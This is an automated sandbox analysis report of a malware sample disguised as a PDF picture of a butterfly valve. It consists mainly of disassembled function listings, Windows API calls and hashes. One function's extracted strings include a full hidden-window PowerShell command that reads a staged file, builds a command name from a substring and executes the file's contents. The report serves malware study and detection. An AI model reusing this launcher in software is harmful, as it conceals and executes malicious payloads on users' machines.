Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
Instruction ID: 2848333a8a5b20597e43067d17cc290ce391feab13c7f73248cb22e1b8f9cacf
Opcode Fuzzy Hash: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
Instruction Fuzzy Hash: 5CD09E31658301AFEF098F20DD16F2EBAA2EB84B01F10962CBA82950E0D6755C159B26

Function 00405947 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?,?,0040555F,?,?,00000000,00405742,?,?,?,?), ref: 0040594C
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405960

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
Instruction ID: 96e5362f07f59601f7516fe8bcac2aa0a8151a45168581d09323fa3b8cc485cf
Opcode Fuzzy Hash: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
Instruction Fuzzy Hash: F7D01272908121AFC2102738ED0C89BBF65EB543717058B35FDB9F22F0D7304C568AA6

Function 00405455 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNELBASE(?,00000000,004030CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032C9), ref: 0040545B
GetLastError.KERNEL32 ref: 00405469

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
Instruction ID: ace853db513f64caea17b5c73fb52fb3118c2a3fabff3065b7385b8b337d2f64
Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
Instruction Fuzzy Hash: 9DC08C30B18101EAC6100B30AE087073D50AB00742F1444356206E10E0C6309050CD2F

Function 00401717 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040172B

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: 985a7ae01e69da493872186c6c10ed37eba87bebab26c0abac89a8346f6e59b4
Instruction ID: 4c956aff6f0d258c6848a8c99906dcba9d38e98bcd0b2081640ab90df76b8672
Opcode Fuzzy Hash: 985a7ae01e69da493872186c6c10ed37eba87bebab26c0abac89a8346f6e59b4
Instruction Fuzzy Hash: E5E0D8B2204100ABE700DB549D48FAA3798DB10368B30853BF201A50C1D2B89A459629

Function 00402B44 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 11541d565f05363a0d465782138c1ad9d83dbb2602eb40d854f4a90bf0086a6c
Instruction ID: 6913ff832cf321f63cdd7bb00c8cc70b6829a5dd8220bacc95ff598af340a114
Opcode Fuzzy Hash: 11541d565f05363a0d465782138c1ad9d83dbb2602eb40d854f4a90bf0086a6c
Instruction Fuzzy Hash: 7FE04FB6240108AFDB00DFA4DD46F9577FCE718701F008021B608D7091C674E5508B69

Function 00405A13 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000020,?,0040305C,00000000,0040A8C0,00000020,0040A8C0,00000020,000000FF,00000004,00000000), ref: 00405A27

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
Instruction ID: edb1125888c6416cb1e0b95ca9609c2ac4c4c792cbd4e8f88826aa2405e91300
Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
Instruction Fuzzy Hash: D7E0EC3261425EEFDF109E659C40AEB7B6DEB053A4F048532FD25E2150E271E8219FB5

Function 004059E4 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040308E,00000000,00000000,00402EEB,000000FF,00000004,00000000,00000000,00000000), ref: 004059F8

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
Instruction ID: 6c2e581bc83b2d89c4a498056592e8f52b2bea012b9e1656670f40d352b29975
Opcode Fuzzy Hash: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
Instruction Fuzzy Hash: 4DE0EC3272429AABDF109E559C44EEF7BACEB05360F048932FD15E3190D235ED219FA9

Function 00403F2A Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00010448,00000000,00000000,00000000), ref: 00403F3C

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
Instruction ID: b8addb9e81407d18270a6acc8ad8b47d243914a4c892372c87671a3bfdf31127
Opcode Fuzzy Hash: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
Instruction Fuzzy Hash: B6C04C71B482017AEA21CB509D49F0677686750B01F5584757210E50D0C6B4E451D62D

Function 00403F13 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000028,?,00000001,00403D44), ref: 00403F21

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
Instruction ID: 7b5ccc39adf6f72de5191684d4495c6b43ffe58f78915606d69c4a7e6f44d702
Opcode Fuzzy Hash: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
Instruction Fuzzy Hash: F3B092B5684200BAEE224B40DD09F457EA2E7A4702F008024B300240B0C6B200A1DB19

Function 00403091 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2D,?), ref: 0040309F

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D

Function 00403F00 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403CDD), ref: 00403F0A

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
Instruction ID: 627edf876ec6fe827e8ded8b6e0f84c3e1bff33d3b07c91bc4a796ca35ff40dd
Opcode Fuzzy Hash: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
Instruction Fuzzy Hash: CAA00176808101ABCB029B50FF09D9ABF62ABA5705B028435E65694174C7325865FF1A

Non-executed Functions

Function 0040488F Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 004048A7
GetDlgItem.USER32(?,00000408), ref: 004048B2
GlobalAlloc.KERNEL32(00000040,?), ref: 004048FC
LoadBitmapA.USER32(0000006E), ref: 0040490F
SetWindowLongA.USER32(?,000000FC,00404E86), ref: 00404928
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040493C
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 0040494E
SendMessageA.USER32(?,00001109,00000002), ref: 00404964
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404970
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404982
DeleteObject.GDI32(00000000), ref: 00404985
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049B0
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049BC
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A51
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404A7C
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A90
GetWindowLongA.USER32(?,000000F0), ref: 00404ABF
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404ACD
ShowWindow.USER32(?,00000005), ref: 00404ADE
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404BDB
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C40
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C55
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404C79
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C99
ImageList_Destroy.COMCTL32(00000000), ref: 00404CAE
GlobalFree.KERNEL32(00000000), ref: 00404CBE
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D37
SendMessageA.USER32(?,00001102,?,?), ref: 00404DE0
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404DEF
InvalidateRect.USER32(?,00000000,00000001), ref: 00404E0F
ShowWindow.USER32(?,00000000), ref: 00404E5D
GetDlgItem.USER32(?,000003FE), ref: 00404E68
ShowWindow.USER32(00000000), ref: 00404E6F

Strings

, xrefs: 00404E47
M, xrefs: 00404A38
N, xrefs: 00404B19

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 8b0289ef19e9e7d4f6956f04046df2f7fedd754f5cc9c605ccbb11d5e9afe659
Instruction ID: e7c54df8ad39b376662a796d960b289492e5a6982c1727c2c37b81bede79f7f2
Opcode Fuzzy Hash: 8b0289ef19e9e7d4f6956f04046df2f7fedd754f5cc9c605ccbb11d5e9afe659
Instruction Fuzzy Hash: 43025EB0A00209AFEF109F54DC85AAE7BB5FB84315F10817AF611B62E1D7789E42DF58

Function 0040431C Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 274stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040436B
SetWindowTextA.USER32(00000000,?), ref: 00404395
SHBrowseForFolderA.SHELL32(?,0041F0E0,?), ref: 00404446
CoTaskMemFree.OLE32(00000000), ref: 00404451
lstrcmpiA.KERNEL32(: Completed,Robotagtige Setup: Completed), ref: 00404483
lstrcatA.KERNEL32(?,: Completed), ref: 0040448F
SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044A1

Part of subcall function 004054D3: GetDlgItemTextA.USER32(?,?,00000400,004044D8), ref: 004054E6

Part of subcall function 00405F64: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030B4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032C9), ref: 00405FBC
Part of subcall function 00405F64: CharNextA.USER32(?,?,?,00000000), ref: 00405FC9
Part of subcall function 00405F64: CharNextA.USER32(?,"C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030B4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032C9), ref: 00405FCE
Part of subcall function 00405F64: CharPrevA.USER32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030B4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032C9), ref: 00405FDE

GetDiskFreeSpaceA.KERNEL32(0041ECD8,?,?,0000040F,?,0041ECD8,0041ECD8,?,00000001,0041ECD8,?,?,000003FB,?), ref: 0040455F
MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040457A

Part of subcall function 004046D3: lstrlenA.KERNEL32(Robotagtige Setup: Completed,Robotagtige Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004045EE,000000DF,00000000,00000400,?), ref: 00404771
Part of subcall function 004046D3: wsprintfA.USER32 ref: 00404779
Part of subcall function 004046D3: SetDlgItemTextA.USER32(?,Robotagtige Setup: Completed), ref: 0040478C

Strings

C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe, xrefs: 0040446C
Robotagtige Setup: Completed, xrefs: 00404419, 0040447C
"powershell.exe" -windowstyle hidden "$Superintendency=Get-Content 'C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\Reshipment.Bag';$Fjernskrivendes=$Superintendency.SubString(1030,3);.$Fjernskrivendes($Superintendency)", xrefs: 00404335
: Completed, xrefs: 0040447D, 00404482, 0040448D
A, xrefs: 0040443F

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: "powershell.exe" -windowstyle hidden "$Superintendency=Get-Content 'C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\Reshipment.Bag';$Fjernskrivendes=$Superintendency.SubString(1030,3);.$Fjernskrivendes($Superintendency)"$: Completed$A$C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe$Robotagtige Setup: Completed
API String ID: 2624150263-1136872094
Opcode ID: 1558e11706ab6d26c01ec83b0c58713cad93a9e9ab837f02d5dc5529ec40a987
Instruction ID: 222947b4accbc62cc0073c5541b0f9589876626f1104fcc3d8441c992cea6716
Opcode Fuzzy Hash: 1558e11706ab6d26c01ec83b0c58713cad93a9e9ab837f02d5dc5529ec40a987
Instruction Fuzzy Hash: 71A17EB1900209ABDB11AFA5CC45BEFB6B8EF84315F14843BF711B62D1D77C8A418B69

Function 00402688 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

